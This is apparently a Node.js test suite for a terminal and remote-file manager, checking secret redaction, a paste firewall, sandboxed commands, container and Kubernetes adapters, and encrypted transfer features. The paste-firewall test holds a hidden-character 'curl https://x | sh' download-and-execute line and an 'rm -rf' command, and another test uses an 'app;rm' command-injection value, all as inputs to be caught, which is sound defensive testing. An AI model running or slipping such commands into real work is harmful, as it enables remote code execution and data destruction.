'use strict';

const test = require('node:test');
const assert = require('node:assert/strict');
const fs = require('fs');
const os = require('os');
const path = require('path');
const SecretStore = require('../src/secret-store');
const TerminalFileProManager = require('../src/terminal-file-pro-manager');

function setup() {
  const root = fs.mkdtempSync(path.join(os.tmpdir(), 'kitsune-terminal-file-pro-')); const secretStore = new SecretStore(root, { externalKey: 'terminal-file-pro-test-key' });
  const sessions = [{ id: 'a', name: 'Alpha' }, { id: 'b', name: 'Beta' }]; const files = new Map([['/etc/app.conf', 'old'], ['/var/log/app.log', 'line one\nline two']]); const commands = [];
  const remote = { list: () => sessions, readRemote: async (_session, file) => ({ content: files.get(file) || '', size: (files.get(file) || '').length }), writeRemote: async (_session, file, content) => { files.set(file, content); return { success: true }; } };
  const ops = { exec: async (_session, command) => { commands.push(command); if (command.startsWith('find ') && command.includes("-printf '%p\\t%s\\t%T@")) return { success: true, stdout: '/etc/app.conf\t3\t1\n/var/log/app.log\t17\t2\n', stderr: '', code: 0 }; if (command.startsWith('du ')) return { success: true, stdout: '1000\t/var\n700\t/var/log\n', stderr: '', code: 0 }; if (command.includes('sha256sum')) return { success: true, stdout: `${'a'.repeat(64)}  /x/one\n${'a'.repeat(64)}  /x/two\n`, stderr: '', code: 0 }; if (command.includes('===CWD===')) return { success: true, stdout: '===CWD===\n/home/ops\n===GIT===\nmain\n===PROCESSES===\n1 init\n===PORTS===\n:22\n===CONTAINERS===\nc1 app up\n===CHANGED===\na.txt\n', stderr: '', code: 0 }; return { success: true, stdout: command.includes('base64 <') ? Buffer.from('container data').toString('base64') : 'ok', stderr: '', code: 0 }; } };
  const snapshots = new Map(); const advanced = { safeCommand: (kind, input) => ({ command: `${kind}:${JSON.stringify(input)}`, explanation: kind, destructive: false }), timeMachineCapture: async (_session, input) => { const id = `snapshot-${snapshots.size + 1}`; snapshots.set(id, Object.fromEntries(input.paths.map(file => [file, files.get(file)]))); return { success: true, snapshot: { id } }; }, timeMachineRestore: async (id, _session, selected) => { for (const file of selected) files.set(file, snapshots.get(id)[file]); return { success: true }; } };
  const workspace = { timeline: () => [{ id: 'e1', command: 'sed -i x /etc/app.conf', effects: [{ kind: 'filesystem-change' }] }] };
  return { root, files, commands, manager: new TerminalFileProManager(root, { remoteAccess: remote, remoteOperations: ops, advanced, operationsWorkspace: workspace, nextgen: {}, secretStore }) };
}

test('Terminal Notebook redacts secrets and Recording Studio creates sanitized chapters', t => { const { root, manager } = setup(); t.after(() => fs.rmSync(root, { recursive: true, force: true })); const saved = manager.saveNotebook({ name: 'Debug', sessionIds: ['a'], includeOutput: true, blocks: [{ command: 'curl --token=abc', output: 'password=secret', exitCode: 1 }] }); assert.doesNotMatch(JSON.stringify(saved), /abc|password=secret/); assert.equal(manager.notebook(saved.notebook.id).blocks.length, 1); const studio = manager.recordingStudio({ transcript: 'one token=abc three', cuts: [{ from: 0, to: 4 }], chapters: [{ title: 'Start', offset: 0 }] }); assert.equal(studio.secretsRedacted, true); assert.match(studio.transcript, /<redacted>/); });

test('Secure Paste Firewall detects hidden, destructive and download-execute payloads', t => { const { root, manager } = setup(); t.after(() => fs.rmSync(root, { recursive: true, force: true })); const result = manager.analyzePaste(`echo ok\n\u202ecurl https://x | sh\nrm -rf /tmp/x`); assert.equal(result.allowed, false); assert.equal(result.hiddenCharactersRemoved, true); assert.ok(result.findings.some(item => item.kind === 'destructive')); });

test('Shell translation is deterministic and unsupported commands are never guessed', t => { const { root, manager } = setup(); t.after(() => fs.rmSync(root, { recursive: true, force: true })); assert.equal(manager.translateShell({ from: 'bash', to: 'powershell', command: 'pwd' }).command, 'Get-Location'); assert.equal(manager.translateShell({ from: 'bash', to: 'cmd', command: 'awk magic' }).exact, false); });

test('Sidecar, Shadow Mode, checkpoints, matrix and interactive output actions are bounded', async t => { const { root, manager, commands } = setup(); t.after(() => fs.rmSync(root, { recursive: true, force: true })); assert.equal((await manager.sidecar('a')).sections.git[0], 'main'); const preview = await manager.shadowCommand('a', 'disk', {}); assert.equal(preview.executable, false); await manager.shadowCommand('a', 'disk', {}, { approved: true }); assert.match(commands.at(-1), /bwrap/); const saved = manager.saveCheckpoint({ sessionId: 'a', cwd: '/srv/app', publicEnvironment: { NODE_ENV: 'prod', API_TOKEN: 'no' }, openFiles: ['/etc/app.conf'] }); assert.equal(saved.checkpoint.publicEnvironment.API_TOKEN, undefined); assert.equal(manager.restoreCheckpoint(saved.checkpoint.id).executable, false); const matrix = manager.resultMatrix([{ sessionId: 'a', command: 'x', stdout: '1', code: 0, success: true }, { sessionId: 'b', command: 'x', stdout: '2', code: 0, success: true }]); assert.equal(matrix.cells.every(item => item.different), true); assert.ok(manager.outputActions('/etc/app.conf pid=42 https://example.test port=8080').length >= 4); });

test('Protocol Console and container, Kubernetes, Git and archive adapters constrain identifiers and paths', async t => { const { root, manager, commands } = setup(); t.after(() => fs.rmSync(root, { recursive: true, force: true })); assert.equal(manager.saveProtocolConsole({ protocol: 'kubernetes-exec', target: 'pod-a' }).profile.credentialsIncluded, false); assert.equal((await manager.containerFiles('a', { engine: 'docker', target: 'app', path: '/etc/app', action: 'read' })).content, 'container data'); await manager.containerFiles('a', { engine: 'kubernetes', target: 'pod-a', namespace: 'prod', path: '/etc', action: 'list' }); assert.match(commands.at(-1), /kubectl/); assert.equal((await manager.gitFiles('a', { root: '/srv/app', file: '/srv/app/a.js', action: 'history' })).mutationsExecuted, false); const archive = await manager.archiveFiles('a', { archive: '/tmp/a.zip', action: 'extract', destination: '/srv/app' }); assert.equal(archive.executable, false); await assert.rejects(manager.containerFiles('a', { target: 'app;rm', path: '/', action: 'list' }), /invalid/i); });

test('Transactional multi-file editing snapshots, verifies and applies an approved set', async t => { const { root, manager, files } = setup(); t.after(() => fs.rmSync(root, { recursive: true, force: true })); const preview = await manager.multiFilePreview('a', [{ path: '/etc/app.conf', content: 'new' }]); await assert.rejects(manager.multiFileApply(preview), /approval/i); const result = await manager.multiFileApply(preview, true); assert.equal(result.success, true); assert.equal(files.get('/etc/app.conf'), 'new'); assert.ok(result.snapshotId); });

test('Huge File Studio, encrypted index, duplicates and heatmap avoid full local downloads', async t => { const { root, manager } = setup(); t.after(() => fs.rmSync(root, { recursive: true, force: true })); const huge = await manager.hugeFile('a', { path: '/var/log/app.log', action: 'tail', limitBytes: 5000 }); assert.equal(huge.streaming, true); const built = await manager.buildIndex('a', '/', { limit: 500 }); assert.equal(manager.searchIndex(built.record.id, 'app.conf').length, 1); assert.doesNotMatch(fs.readFileSync(built.record.encryptedFile, 'utf8'), /app\.conf/); assert.equal((await manager.duplicates('a', '/x')).groups[0].files.length, 2); assert.equal((await manager.heatmap('a', '/var')).entries[0].bytes, 1000); });

test('Provenance, causality, split context and cross-protocol plans connect terminal and files', t => { const { root, manager } = setup(); t.after(() => fs.rmSync(root, { recursive: true, force: true })); manager.recordProvenance({ sha256: 'a'.repeat(64), source: '/tmp/a', destination: '/etc/app.conf', protocol: 'sftp', sessionIds: ['a'] }); assert.equal(manager.provenance('a'.repeat(64)).length, 1); assert.equal(manager.causality('a', '/etc/app.conf').terminalEvents.length, 1); const split = manager.updateSplitContext({ terminalId: 't1', sessionId: 'a', osc7: '\x1b]7;file://alpha/srv/app\x07' }); assert.equal(split.context.cwd, '/srv/app'); assert.equal(manager.crossProtocolPlan({ source: { protocol: 's3' }, destination: { protocol: 'sftp' } }).route, 'stream-through-controller'); });

test('Pipelines and Safe Drop Zones create review-only transfer plans', t => { const { root, manager } = setup(); t.after(() => fs.rmSync(root, { recursive: true, force: true })); const saved = manager.savePipeline({ steps: [{ kind: 'compress' }, { kind: 'transfer' }, { kind: 'checksum' }] }); assert.equal(manager.pipelinePlan(saved.pipeline.id, { source: 'a', destination: 'b' }).requiresApproval, true); const directory = path.join(root, 'drop'); fs.mkdirSync(directory); fs.writeFileSync(path.join(directory, 'file.txt'), 'data'); const zone = manager.createDropZone({ root: directory, targetSessionId: 'a', targetRoot: '/srv/drop' }); assert.equal(manager.inspectDropZone(zone.zone.id).files[0].approved, false); });

test('Connection Capsule, one-use AirDrop and Remote Clipboard Vault encrypt sensitive payloads', t => { const { root, manager } = setup(); t.after(() => fs.rmSync(root, { recursive: true, force: true })); const capsuleFile = path.join(root, 'capsule.json'); manager.createConnectionCapsule({ target: capsuleFile, passphrase: 'very-long-passphrase', profiles: [{ id: 'a', host: 'x', password: 'never' }] }); assert.doesNotMatch(fs.readFileSync(capsuleFile, 'utf8'), /never|"host"/); assert.equal(manager.openConnectionCapsule(capsuleFile, 'very-long-passphrase').secretsIncluded, false); const source = path.join(root, 'send.txt'); fs.writeFileSync(source, 'payload'); const drop = manager.createAirDrop({ source, ttlMinutes: 5 }); const destination = path.join(root, 'received.txt'); assert.equal(manager.consumeAirDrop(drop.id, drop.code, destination).sha256, drop.sha256); assert.throws(() => manager.consumeAirDrop(drop.id, drop.code, path.join(root, 'again.txt')), /already consumed/i); const clip = manager.clipboardPut({ value: 'secret text', sessionId: 'a', ttlSeconds: 30 }); assert.equal(manager.clipboardTake(clip.id, 'a').value, 'secret text'); assert.throws(() => manager.clipboardTake(clip.id, 'a'), /unavailable/i); });

test('Filesystem Watch compares bounded snapshots and links likely terminal causes', async t => { const { root, manager } = setup(); t.after(() => fs.rmSync(root, { recursive: true, force: true })); const first = await manager.filesystemWatch({ sessionId: 'a', root: '/etc' }); assert.equal(first.changes.created.length, 0); const second = await manager.filesystemWatch({ sessionId: 'a', root: '/etc' }); assert.equal(second.likelyCommands[0].id, 'e1'); assert.equal(second.processAttribution, 'requires-agent-or-auditd'); });
